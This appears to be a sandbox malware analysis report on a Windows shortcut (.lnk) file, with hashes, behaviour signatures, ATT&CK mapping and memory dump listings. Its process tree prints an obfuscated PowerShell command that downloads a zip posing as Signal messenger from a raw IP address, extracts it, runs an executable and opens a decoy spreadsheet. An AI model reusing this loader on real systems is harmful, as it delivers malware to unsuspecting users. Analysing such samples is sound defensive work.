ddd94d9d25f4ee02343b209e6d345457ef0b3efebccfd9a16b721e1c59a6cb03

Analysis

max time kernel
117s
max time network
118s
platform
windows7_x64
resource
win7-20240729-en
resource tags

arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
submitted
31/08/2024, 02:03 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ddd94d9d25f4ee02343b209e6d345457ef0b3efebccfd9a16b721e1c59a6cb03.lnk
Size

32KB
MD5

0ea3d54cecf6ea4d5e6739ffe9ce4be4
SHA1

513dca9cb690972319181c4f31ac98dcd80ea895
SHA256

ddd94d9d25f4ee02343b209e6d345457ef0b3efebccfd9a16b721e1c59a6cb03
SHA512

33826667e53d5cdb60ccfeb84a309059e20ce5da79d7dde853578fcea99b44d2a92debe4d6da65f463223b48d1b9f510bb0c9c3b26e7fb0b2a5199eb6ead45d2
SSDEEP

48:88muavUQSSesYOhI3YMEDo/i1xCoXEEDDo/L8A7NZdCZFXuGdZTa7x:88y8EesYeI3hX+xCRZR4uKQ

Score

3^/10

Malware Config

Signatures

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2740	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2740	powershell.exe

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 1908 wrote to memory of 2740	1908	cmd.exe	32
PID 1908 wrote to memory of 2740	1908	cmd.exe	32
PID 1908 wrote to memory of 2740	1908	cmd.exe	32

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\ddd94d9d25f4ee02343b209e6d345457ef0b3efebccfd9a16b721e1c59a6cb03.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:1908
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win 1 echo TeuldrVGQbKMoxomeUoWOqhwvLOxvRa; echo kHymKfRwuZXnxCZJgAfmykUgOsaYlqvqidzuAVdr; echo BzhKUakeDaTwVhpLOdFPPdFVoZgkSjggfDEAGyfrfJLDRccpyaIWIA; if (-not(Test-Path 'signalmessenger.zip' -PathType Leaf)){&(G''et-C''om''ma''nd in???e-webr**) -uri h''t''tp:''//''83''.''22''2''.''1''91''.''20''1/signalmessenger.zip -OutFile signalmessenger.zip}; echo kUBgvnjkEnVVtBTakWaQxmlPinKUrVTnqYKyBiuNzxKhEEivsinzTrJtp; Expand-Archive -Path signalmessenger.zip -DestinationPath SecurityCheck; s''tar''t SecurityCheck/Newfts.exe; echo KXIRBZFhgPOZEKacAcLhfiuehKFFEsRDolDsCVbHJSxXKtveGjGXJJi; &(Ge''t-Com''ma''nd in???e-webre***) -uri h''t''tp:''//''83''.''22''2''.''1''91''.''20''1/racs/rv_luti_2024_roku.xlsx -OutFile rv_luti_2024_roku.xlsx; echo QnvQaCnoZGPZHtQIYplmH; s''t''a''rt rv_luti_2024_roku.xlsx
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2740

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2740-38-0x000007FEF5B8E000-0x000007FEF5B8F000-memory.dmp

Filesize
4KB

Download
memory/2740-39-0x000000001B670000-0x000000001B952000-memory.dmp

Filesize
2.9MB

Download
memory/2740-43-0x000007FEF58D0000-0x000007FEF626D000-memory.dmp

Filesize
9.6MB

Download
memory/2740-42-0x000007FEF58D0000-0x000007FEF626D000-memory.dmp

Filesize
9.6MB

Download
memory/2740-41-0x000007FEF58D0000-0x000007FEF626D000-memory.dmp

Filesize
9.6MB

Download
memory/2740-40-0x0000000002680000-0x0000000002688000-memory.dmp

Filesize
32KB

Download
memory/2740-44-0x000007FEF58D0000-0x000007FEF626D000-memory.dmp

Filesize
9.6MB

Download
memory/2740-45-0x000007FEF58D0000-0x000007FEF626D000-memory.dmp

Filesize
9.6MB

Download